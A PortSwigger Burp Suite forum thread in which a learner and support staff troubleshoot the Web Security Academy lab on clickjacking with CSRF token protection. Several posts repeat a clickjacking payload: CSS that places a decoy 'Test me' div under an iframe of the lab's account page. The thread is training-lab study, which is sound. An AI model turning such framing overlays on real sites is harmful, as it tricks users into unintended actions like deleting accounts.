Research Academy
My account Customers About Blog Careers Legal Contact Resellers

Burp Suite User Forum

Create new post

Possible error in 'Lab: Basic clickjacking with CSRF token protection'

akibaRubi | Last updated: Jul 24, 2024 05:44PM UTC

Despite I inputted the URL of the account page of the dangerous delete button, the log in page is displayed in the exploit server instead of the page containing the dangerous delete button

Ben, PortSwigger Agent | Last updated: Jul 25, 2024 05:56AM UTC

Hi, Are you using the embedded browser when you attempt this lab? If so, if you use a standard version of Chrome does this allow to complete the lab successfully?

akibaRubi | Last updated: Jul 25, 2024 11:54AM UTC

I used the embedded browser. I also tried it with Chrome

Ben, PortSwigger Agent | Last updated: Jul 25, 2024 11:58AM UTC

Hi, The embedded browser will no longer work with this subset of labs - as far as we were aware, using a normal version of Chrome should still work however. Are you able to provide us with details of the exploit you are using and what you see when you use the view exploit functionality?

akibaRubi | Last updated: Jul 25, 2024 01:57PM UTC

Below is the exploit <style> iframe { position:relative; width: 500px; height: 700px; opacity: 1; z-index: 2; } div { position:absolute; top:300px; left:60px; z-index: 1; } </style> <div>Test me</div> <iframe src="https://0a8f0036047ee3be880f4caf007a0037.web-security-academy.net/my-account?id=wiener"></iframe>

akibaRubi | Last updated: Jul 25, 2024 02:03PM UTC

What I see is the login page for inputting username and password with the login button

Ben, PortSwigger Agent | Last updated: Jul 26, 2024 06:54AM UTC

Hi, If you remove the id parameter from your exploit, does this then work for you (if you also use a standard version of Chrome)? So rather than: <iframe src="https://0a8f0036047ee3be880f4caf007a0037.web-security-academy.net/my-account?id=wiener"></iframe> Use: <iframe src="https://0a8f0036047ee3be880f4caf007a0037.web-security-academy.net/my-account"></iframe>

akibaRubi | Last updated: Jul 26, 2024 07:40PM UTC

<style> iframe { position:relative; width:500px; height: 700px; opacity: 1; z-index: 2; } div { position:absolute; top:300px; left:60px; z-index: 1; } </style> <div>Test me</div> <iframe src="https://0a7200fe0324b93982815bf400060091.web-security-academy.net/my-account"></iframe>

akibaRubi | Last updated: Jul 26, 2024 07:40PM UTC

<style> iframe { position:relative; width:500px; height: 700px; opacity: 1; z-index: 2; } div { position:absolute; top:300px; left:60px; z-index: 1; } </style> <div>Test me</div> <iframe src="https://0a7200fe0324b93982815bf400060091.web-security-academy.net/my-account"></iframe>

akibaRubi | Last updated: Jul 26, 2024 07:58PM UTC

It is still showing the login page in the exploit server

Ben, PortSwigger Agent | Last updated: Jul 26, 2024 08:02PM UTC

Hi, You are also using a normal version of Chrome when you deliver this exploit (not the embedded browser)?

akibaRubi | Last updated: Jul 28, 2024 02:13PM UTC

I tried it on both Chrome and the embedded browser.

Ben, PortSwigger Agent | Last updated: Jul 28, 2024 03:38PM UTC

Hi, Are you able to email us at support@portswigger.net and include some screenshots (or a screen recording) of the steps that you are taking in your Chrome browser so that we can see this exactly?

akibaRubi | Last updated: Jul 30, 2024 07:31PM UTC

Email with screen recording sent

Dominyque, PortSwigger Agent | Last updated: Jul 31, 2024 10:53AM UTC

Hi akibaRubi, We have received your email, thank you

akibaRubi | Last updated: Aug 03, 2024 11:52AM UTC

okay, lab solved. Thanks

Michelle, PortSwigger Agent | Last updated: Aug 05, 2024 07:57AM UTC

Thanks for the update :)

You must be an existing, logged-in customer to reply to a thread. Please email us for additional support.